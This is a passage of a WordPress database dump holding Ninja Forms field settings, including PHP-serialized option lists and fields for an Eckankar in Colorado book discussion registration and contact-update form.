aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(14354,467,'container_class','','container_class',''),(14355,467,'element_class','','element_class',''),(14356,467,'admin_label','','admin_label',''),(14357,467,'help_text','','help_text',''),(14358,467,'drawerDisabled','','drawerDisabled',''),(14359,467,'parent_id','50','parent_id','50'),(14360,468,'objectType','Field','objectType','Field'),(14361,468,'objectDomain','fields','objectDomain','fields'),(14362,468,'editActive','','editActive',''),(14363,468,'order','10','order','10'),(14364,468,'label','Question 4','label','Question 4'),(14365,468,'type','textbox','type','textbox'),(14366,468,'key','question_4_1523910969934','key','question_4_1523910969934'),(14367,468,'label_pos','default','label_pos','default'),(14368,468,'required','','required',''),(14369,468,'default','','default',''),(14370,468,'placeholder','','placeholder',''),(14371,468,'container_class','','container_class',''),(14372,468,'element_class','','element_class',''),(14373,468,'input_limit','','input_limit',''),(14374,468,'input_limit_type','characters','input_limit_type','characters'),(14375,468,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(14376,468,'manual_key','','manual_key',''),(14377,468,'admin_label','','admin_label',''),(14378,468,'help_text','','help_text',''),(14379,468,'mask','','mask',''),(14380,468,'custom_mask','','custom_mask',''),(14381,468,'custom_name_attribute','','custom_name_attribute',''),(14382,468,'drawerDisabled','','drawerDisabled',''),(14383,468,'parent_id','50','parent_id','50'),(14384,469,'objectType','Field','objectType','Field'),(14385,469,'objectDomain','fields','objectDomain','fields'),(14386,469,'editActive','','editActive',''),(14387,469,'order','11','order','11'),(14388,469,'label','Question 5','label','Question 5'),(14389,469,'type','textarea','type','textarea'),(14390,469,'key','question_5_1523910981688','key','question_5_1523910981688'),(14391,469,'label_pos','default','label_pos','default'),(14392,469,'required','','required',''),(14393,469,'default','','default',''),(14394,469,'placeholder','','placeholder',''),(14395,469,'container_class','','container_class',''),(14396,469,'element_class','','element_class',''),(14397,469,'input_limit','','input_limit',''),(14398,469,'input_limit_type','characters','input_limit_type','characters'),(14399,469,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(14400,469,'manual_key','','manual_key',''),(14401,469,'admin_label','','admin_label',''),(14402,469,'help_text','','help_text',''),(14403,469,'textarea_rte','','textarea_rte',''),(14404,469,'disable_rte_mobile','','disable_rte_mobile',''),(14405,469,'textarea_media','','textarea_media',''),(14406,469,'drawerDisabled','','drawerDisabled',''),(14407,469,'parent_id','50','parent_id','50'),(14408,470,'objectType','Field','objectType','Field'),(14409,470,'objectDomain','fields','objectDomain','fields'),(14410,470,'editActive','','editActive',''),(14411,470,'order','12','order','12'),(14412,470,'type','submit','type','submit'),(14413,470,'label','Submit','label','Submit'),(14414,470,'processing_label','Processing','processing_label','Processing'),(14415,470,'container_class','','container_class',''),(14416,470,'element_class','','element_class',''),(14417,470,'key','submit_1523910734890','key','submit_1523910734890'),(14418,470,'parent_id','50','parent_id','50'),(14419,471,'objectType','Field','objectType','Field'),(14420,471,'objectDomain','fields','objectDomain','fields'),(14421,471,'editActive','','editActive',''),(14422,471,'order','1','order','1'),(14423,471,'idAttribute','id','idAttribute','id'),(14424,471,'label','Loveland - Book Discussion Registration -Autobiography of a Modern Prophet','label','Loveland - Book Discussion Registration -Autobiography of a Modern Prophet'),(14425,471,'key','loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284','key','loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284'),(14426,471,'type','html','type','html'),(14427,471,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14428,471,'default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Loveland - Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Loveland - Book Discussion Registration -Autobiography of a Modern Prophet</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>'),(14429,471,'container_class','','container_class',''),(14430,471,'element_class','','element_class',''),(14431,471,'field_label','Book Discussion Registration -Autobiography of a Modern Prophet','field_label','Book Discussion Registration -Autobiography of a Modern Prophet'),(14432,471,'field_key','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063','field_key','book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063'),(14433,471,'drawerDisabled','','drawerDisabled',''),(14434,471,'parent_id','44','parent_id','44'),(14435,472,'key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(14436,472,'element_class','','element_class',''),(14437,472,'container_class','','container_class',''),(14438,472,'editActive','','editActive',''),(14439,472,'order','8','order','8'),(14440,472,'idAttribute','id','idAttribute','id'),(14441,472,'label','','label',''),(14442,472,'type','html','type','html'),(14443,472,'default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>'),(14444,472,'drawerDisabled','','drawerDisabled',''),(14445,472,'field_label','','field_label',''),(14446,472,'field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(14447,473,'objectType','Field','objectType','Field'),(14448,473,'objectDomain','fields','objectDomain','fields'),(14449,473,'editActive','','editActive',''),(14450,473,'order','2','order','2'),(14451,473,'idAttribute','id','idAttribute','id'),(14452,473,'label','Divider','label','Divider'),(14453,473,'key','hr','key','hr'),(14454,473,'type','hr','type','hr'),(14455,473,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14456,473,'container_class','','container_class',''),(14457,473,'element_class','','element_class',''),(14458,473,'field_label','Divider','field_label','Divider'),(14459,473,'field_key','hr','field_key','hr'),(14460,473,'parent_id','44','parent_id','44'),(14461,474,'drawerDisabled','','drawerDisabled',''),(14462,474,'objectType','Field','objectType','Field'),(14463,474,'objectDomain','fields','objectDomain','fields'),(14464,474,'editActive','','editActive',''),(14465,474,'order','3','order','3'),(14466,474,'idAttribute','id','idAttribute','id'),(14467,474,'label','First Name','label','First Name'),(14468,474,'key','firstname','key','firstname'),(14469,474,'type','firstname','type','firstname'),(14470,474,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14471,474,'label_pos','default','label_pos','default'),(14472,474,'required','1','required','1'),(14473,474,'default','','default',''),(14474,474,'placeholder','','placeholder',''),(14475,474,'container_class','','container_class',''),(14476,474,'element_class','','element_class',''),(14477,474,'admin_label','','admin_label',''),(14478,474,'help_text','','help_text',''),(14479,474,'desc_text','','desc_text',''),(14480,474,'field_label','First Name','field_label','First Name'),(14481,474,'field_key','firstname','field_key','firstname'),(14482,474,'custom_name_attribute','fname','custom_name_attribute','fname'),(14483,474,'personally_identifiable','1','personally_identifiable','1'),(14484,474,'value','','value',''),(14485,474,'parent_id','44','parent_id','44'),(14486,475,'objectType','Field','objectType','Field'),(14487,475,'objectDomain','fields','objectDomain','fields'),(14488,475,'editActive','','editActive',''),(14489,475,'order','4','order','4'),(14490,475,'idAttribute','id','idAttribute','id'),(14491,475,'label','Last Name','label','Last Name'),(14492,475,'key','lastname','key','lastname'),(14493,475,'type','lastname','type','lastname'),(14494,475,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14495,475,'label_pos','default','label_pos','default'),(14496,475,'required','1','required','1'),(14497,475,'default','','default',''),(14498,475,'placeholder','','placeholder',''),(14499,475,'container_class','','container_class',''),(14500,475,'element_class','','element_class',''),(14501,475,'admin_label','','admin_label',''),(14502,475,'help_text','','help_text',''),(14503,475,'desc_text','','desc_text',''),(14504,475,'field_label','Last Name','field_label','Last Name'),(14505,475,'field_key','lastname','field_key','lastname'),(14506,475,'custom_name_attribute','lname','custom_name_attribute','lname'),(14507,475,'personally_identifiable','1','personally_identifiable','1'),(14508,475,'value','','value',''),(14509,475,'drawerDisabled','','drawerDisabled',''),(14510,475,'parent_id','44','parent_id','44'),(14511,476,'objectType','Field','objectType','Field'),(14512,476,'objectDomain','fields','objectDomain','fields'),(14513,476,'editActive','','editActive',''),(14514,476,'order','5','order','5'),(14515,476,'idAttribute','id','idAttribute','id'),(14516,476,'label','Email','label','Email'),(14517,476,'key','email','key','email'),(14518,476,'type','email','type','email'),(14519,476,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14520,476,'label_pos','default','label_pos','default'),(14521,476,'required','1','required','1'),(14522,476,'default','','default',''),(14523,476,'placeholder','','placeholder',''),(14524,476,'container_class','one-half first','container_class','one-half first'),(14525,476,'element_class','','element_class',''),(14526,476,'admin_label','','admin_label',''),(14527,476,'help_text','','help_text',''),(14528,476,'desc_text','','desc_text',''),(14529,476,'field_label','Email','field_label','Email'),(14530,476,'field_key','email','field_key','email'),(14531,476,'custom_name_attribute','email','custom_name_attribute','email'),(14532,476,'personally_identifiable','1','personally_identifiable','1'),(14533,476,'value','','value',''),(14534,476,'parent_id','44','parent_id','44'),(14535,477,'drawerDisabled','','drawerDisabled',''),(14536,477,'objectType','Field','objectType','Field'),(14537,477,'objectDomain','fields','objectDomain','fields'),(14538,477,'editActive','','editActive',''),(14539,477,'order','9','order','9'),(14540,477,'idAttribute','id','idAttribute','id'),(14541,477,'label','Submit','label','Submit'),(14542,477,'key','submit_1618628929218','key','submit_1618628929218'),(14543,477,'type','submit','type','submit'),(14544,477,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(14545,477,'processing_label','Processing','processing_label','Processing'),(14546,477,'container_class','','container_class',''),(14547,477,'element_class','','element_class',''),(14548,477,'field_label','Submit','field_label','Submit'),(14549,477,'field_key','submit_1618628929218','field_key','submit_1618628929218'),(14550,477,'parent_id','44','parent_id','44'),(14839,427,'drawerDisabled','','drawerDisabled',''),(14848,495,'drawerDisabled','','drawerDisabled',''),(14849,495,'container_class','','container_class',''),(14850,495,'field_key','html_201','field_key','html_201'),(14851,495,'field_label','Text','field_label','Text'),(14852,495,'editActive','','editActive',''),(14853,495,'type','html','type','html'),(14854,495,'order','1','order','1'),(14855,495,'fav_id','','fav_id',''),(14856,495,'def_id','','def_id',''),(14857,495,'label','Text','label','Text'),(14858,495,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(14859,495,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>'),(14860,495,'desc_el','div','desc_el','div'),(14861,495,'show_desc','0','show_desc','0'),(14862,495,'desc_pos','none','desc_pos','none'),(14863,495,'desc_text','','desc_text',''),(14864,495,'element_class','','element_class',''),(14865,495,'default','<h3><span style=\"color: #23507d;font-size: 28px;text-transform: capitalize;\">Add/Update Email or Mailing Address</span></h3><p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size: 22px;\"><br>Your Information Is Safe</span></strong></p><p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>','default','<h3><span style=\"color: #23507d;font-size: 28px;text-transform: capitalize;\">Add/Update Email or Mailing Address</span></h3><p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size: 22px;\"><br>Your Information Is Safe</span></strong></p><p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>'),(14866,495,'key','html_201','key','html_201'),(14867,495,'parent_id','4','parent_id','4'),(14868,495,'idAttribute','id','idAttribute','id'),(14869,496,'value','','value',''),(14870,496,'personally_identifiable','','personally_identifiable',''),(14871,496,'custom_name_attribute','','custom_name_attribute',''),(14872,496,'custom_mask','','custom_mask',''),(14873,496,'manual_key','','manual_key',''),(14874,496,'container_class','one-half first ','container_class','one-half first '),(14875,496,'default','','default',''),(14876,496,'field_key','textbox_202','field_key','textbox_202'),(14877,496,'field_label','First Name','field_label','First Name'),(14878,496,'editActive','','editActive',''),(14879,496,'type','textbox','type','textbox'),(14880,496,'order','2','order','2'),(14881,496,'fav_id','','fav_id',''),(14882,496,'def_id','6','def_id','6'),(14883,496,'label','First Name','label','First Name'),(14884,496,'label_pos','above','label_pos','above'),(14885,496,'mask','','mask',''),(14886,496,'datepicker','0','datepicker','0'),(14887,496,'first_name','1','first_name','1'),(14888,496,'last_name','0','last_name','0'),(14889,496,'from_name','0','from_name','0'),(14890,496,'user_info_field_group','1','user_info_field_group','1'),(14891,496,'show_help','0','show_help','0'),(14892,496,'help_text','','help_text',''),(14893,496,'calc_auto_include','0','calc_auto_include','0'),(14894,496,'calc_option','0','calc_option','0'),(14895,496,'placeholder','','placeholder',''),(14896,496,'user_address_1','','user_address_1',''),(14897,496,'user_address_2','','user_address_2',''),(14898,496,'user_city','','user_city',''),(14899,496,'user_zip','','user_zip',''),(14900,496,'user_phone','','user_phone',''),(14901,496,'user_email','','user_email',''),(14902,496,'disable_input','0','disable_input','0'),(14903,496,'input_limit','','input_limit',''),(14904,496,'input_limit_type','char','input_limit_type','char'),(14905,496,'input_limit_msg','','input_limit_msg',''),(14906,496,'user_state','0','user_state','0'),(14907,496,'autocomplete_off','0','autocomplete_off','0'),(14908,496,'num_sort','0','num_sort','0'),(14909,496,'admin_label','','admin_label',''),(14910,496,'user_info_field_group_name','','user_info_field_group_name',''),(14911,496,'user_info_field_group_custom','','user_info_field_group_custom',''),(14912,496,'show_desc','0','show_desc','0'),(14913,496,'desc_pos','none','desc_pos','none'),(14914,496,'desc_text','','desc_text',''),(14915,496,'element_class','','element_class',''),(14916,496,'required','1','required','1'),(14917,496,'key','textbox_202','key','textbox_202'),(14918,496,'parent_id','4','parent_id','4'),(14919,496,'idAttribute','id','idAttribute','id'),(14920,496,'drawerDisabled','','drawerDisabled',''),(14921,497,'value','','value',''),(14922,497,'personally_identifiable','1','personally_identifiable','1'),(14923,497,'custom_name_attribute','lname','custom_name_attribute','lname'),(14924,497,'container_class','one-half','container_class','one-half'),(14925,497,'default','','default',''),(14926,497,'field_key','lastname_203','field_key','lastname_203'),(14927,497,'field_label','Last Name','field_label','Last Name'),(14928,497,'editActive','','editActive',''),(14929,497,'type','lastname','type','lastname'),(14930,497,'order','3','order','3'),(14931,497,'fav_id','','fav_id',''),(14932,497,'def_id','7','def_id','7'),(14933,497,'label','Last Name','label','Last Name'),(14934,497,'label_pos','above','label_pos','above'),(14935,497,'mask','','mask',''),(14936,497,'datepicker','0','datepicker','0'),(14937,497,'first_name','0','first_name','0'),(14938,497,'from_name','0','from_name','0'),(14939,497,'user_info_field_group','1','user_info_field_group','1'),(14940,497,'show_help','0','show_help','0'),(14941,497,'help_text','','help_text',''),(14942,497,'calc_auto_include','0','calc_auto_include','0'),(14943,497,'calc_option','0','calc_option','0'),(14944,497,'placeholder','','placeholder',''),(14945,497,'user_address_1','','user_address_1',''),(14946,497,'user_address_2','','user_address_2',''),(14947,497,'user_city','','user_city',''),(14948,497,'user_zip','','user_zip',''),(14949,497,'user_phone','','user_phone',''),(14950,497,'user_email','','user_email',''),(14951,497,'disable_input','0','disable_input','0'),(14952,497,'input_limit','','input_limit',''),(14953,497,'input_limit_type','char','input_limit_type','char'),(14954,497,'input_limit_msg','','input_limit_msg',''),(14955,497,'user_state','0','user_state','0'),(14956,497,'autocomplete_off','0','autocomplete_off','0'),(14957,497,'num_sort','0','num_sort','0'),(14958,497,'admin_label','','admin_label',''),(14959,497,'user_info_field_group_name','','user_info_field_group_name',''),(14960,497,'user_info_field_group_custom','','user_info_field_group_custom',''),(14961,497,'show_desc','0','show_desc','0'),(14962,497,'desc_pos','none','desc_pos','none'),(14963,497,'desc_text','','desc_text',''),(14964,497,'element_class','','element_class',''),(14965,497,'required','1','required','1'),(14966,497,'key','lastname_203','key','lastname_203'),(14967,497,'parent_id','4','parent_id','4'),(14968,497,'idAttribute','id','idAttribute','id'),(14969,497,'drawerDisabled','','drawerDisabled',''),(14970,498,'value','','value',''),(14971,498,'personally_identifiable','1','personally_identifiable','1'),(14972,498,'custom_name_attribute','phone','custom_name_attribute','phone'),(14973,498,'custom_mask','','custom_mask',''),(14974,498,'manual_key','','manual_key',''),(14975,498,'container_class','one-half first','container_class','one-half first'),(14976,498,'default','','default',''),(14977,498,'field_key','phone_205','field_key','phone_205'),(14978,498,'field_label','Phone','field_label','Phone'),(14979,498,'editActive','','editActive',''),(14980,498,'type','phone','type','phone'),(14981,498,'order','4','order','4'),(14982,498,'fav_id','','fav_id',''),(14983,498,'def_id','15','def_id','15'),(14984,498,'label','Phone','label','Phone'),(14985,498,'label_pos','above','label_pos','above'),(14986,498,'mask','(999) 999-9999','mask','(999) 999-9999'),(14987,498,'datepicker','0','datepicker','0'),(14988,498,'first_name','0','first_name','0'),(14989,498,'last_name','0','last_name','0'),(14990,498,'from_name','0','from_name','0'),(14991,498,'user_address_1','0','user_address_1','0'),(14992,498,'user_address_2','0','user_address_2','0'),(14993,498,'user_city','0','user_city','0'),(14994,498,'user_zip','0','user_zip','0'),(14995,498,'user_email','0','user_email','0'),(14996,498,'user_info_field_group','1','user_info_field_group','1'),(14997,498,'show_help','0','show_help','0'),(14998,498,'help_text','','help_text',''),(14999,498,'calc_auto_include','0','calc_auto_include','0'),(15000,498,'calc_option','0','calc_option','0'),(15001,498,'placeholder','','placeholder',''),(15002,498,'disable_input','0','disable_input','0'),(15003,498,'input_limit','','input_limit',''),(15004,498,'input_limit_type','char','input_limit_type','char'),(15005,498,'input_limit_msg','','input_limit_msg',''),(15006,498,'user_state','0','user_state','0'),(15007,498,'autocomplete_off','0','autocomplete_off','0'),(15008,498,'num_sort','0','num_sort','0'),(15009,498,'admin_label','','admin_label',''),(15010,498,'user_info_field_group_name','','user_info_field_group_name',''),(15011,498,'user_info_field_group_custom','','user_info_field_group_custom',''),(15012,498,'show_desc','0','show_desc','0'),(15013,498,'desc_pos','none','desc_pos','none'),(15014,498,'desc_text','','desc_text',''),(15015,498,'element_class','','element_class',''),(15016,498,'required','0','required','0'),(15017,498,'key','phone_205','key','phone_205'),(15018,498,'parent_id','4','parent_id','4'),(15019,498,'idAttribute','id','idAttribute','id'),(15020,498,'drawerDisabled','','drawerDisabled',''),(15021,499,'value','','value',''),(15022,499,'personally_identifiable','1','personally_identifiable','1'),(15023,499,'custom_name_attribute','email','custom_name_attribute','email'),(15024,499,'container_class','one-half','container_class','one-half'),(15025,499,'default','','default',''),(15026,499,'field_key','email_204','field_key','email_204'),(15027,499,'field_label','Email    (please fill in if adding or updating email)','field_label','Email    (please fill in if adding or updating email)'),(15028,499,'editActive','','editActive',''),(15029,499,'type','email','type','email'),(15030,499,'order','5','order','5'),(15031,499,'fav_id','','fav_id',''),(15032,499,'def_id','14','def_id','14'),(15033,499,'label','Email    (please fill in if adding or updating email)','label','Email    (please fill in if adding or updating email)'),(15034,499,'label_pos','above','label_pos','above'),(15035,499,'mask','','mask',''),(15036,499,'datepicker','0','datepicker','0'),(15037,499,'first_name','0','first_name','0'),(15038,499,'last_name','0','last_name','0'),(15039,499,'from_name','0','from_name','0'),(15040,499,'user_address_1','0','user_address_1','0'),(15041,499,'user_address_2','0','user_address_2','0'),(15042,499,'user_city','0','user_city','0'),(15043,499,'user_zip','0','user_zip','0'),(15044,499,'user_phone','0','user_phone','0'),(15045,499,'user_info_field_group','1','user_info_field_group','1'),(15046,499,'show_help','0','show_help','0'),(15047,499,'help_text','','help_text',''),(15048,499,'calc_auto_include','0','calc_auto_include','0'),(15049,499,'calc_option','0','calc_option','0'),(15050,499,'placeholder','','placeholder',''),(15051,499,'disable_input','0','disable_input','0'),(15052,499,'input_limit','','input_limit',''),(15053,499,'input_limit_type','char','input_limit_type','char'),(15054,499,'input_limit_msg','','input_limit_msg',''),(15055,499,'user_state','0','user_state','0'),(15056,499,'autocomplete_off','0','autocomplete_off','0'),(15057,499,'num_sort','0','num_sort','0'),(15058,499,'admin_label','','admin_label',''),(15059,499,'user_info_field_group_name','','user_info_field_group_name',''),(15060,499,'user_info_field_group_custom','','user_info_field_group_custom',''),(15061,499,'show_desc','0','show_desc','0'),(15062,499,'desc_pos','none','desc_pos','none'),(15063,499,'desc_text','','desc_text',''),(15064,499,'element_class','','element_class',''),(15065,499,'required','0','required','0'),(15066,499,'key','email_204','key','email_204'),(15067,499,'parent_